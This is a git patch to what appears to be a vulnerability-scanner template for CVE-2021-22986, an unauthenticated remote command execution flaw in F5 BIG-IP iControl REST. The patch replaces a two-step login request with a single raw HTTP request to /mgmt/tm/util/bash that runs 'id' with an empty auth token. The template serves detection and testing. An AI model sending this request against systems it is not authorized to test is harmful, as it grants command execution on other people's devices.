From 5ec6402b7a933a4de92da6b7879fa9bafc248518 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 3 Oct 2021 12:24:46 +0200
Subject: [PATCH] Fix CVE-2021-22986.yaml

---
 cves/2021/CVE-2021-22986.yaml | 23 ++++++++---------------
 1 file changed, 8 insertions(+), 15 deletions(-)

diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml
index 230b015a29..16bd33f494 100644
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-22986
 info:
   name: F5 BIG-IP iControl REST unauthenticated RCE
-  author: rootxharsh,iamnoooob
+  author: rootxharsh,iamnoooob,swissky
   severity: critical
   tags: bigip,cve,cve2021,rce
   description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
@@ -15,25 +15,18 @@ info:
 
 requests:
   - raw:
-      - |
-        POST /mgmt/shared/authn/login HTTP/1.1
-        Host: {{Hostname}}
-        Accept-Language: en
-        Authorization: Basic YWRtaW46
-        Content-Type: application/json
-        Cookie: BIGIPAuthCookie=1234
-        Connection: close
-
-        {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
       - |
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: {{Hostname}}
-        Accept-Language: en
-        X-F5-Auth-Token: §token§
-        Content-Type: application/json
+        Accept-Encoding: gzip, deflate
+        Accept: */*
         Connection: close
+        Content-Type: application/json
+        X-F5-Auth-Token:
+        Authorization: Basic YWRtaW46
+        Content-Length: 42
 
-        {"command":"run","utilCmdArgs":"-c id"}
+        {"command": "run", "utilCmdArgs": "-c id"}
 
     extractors:
       - type: regex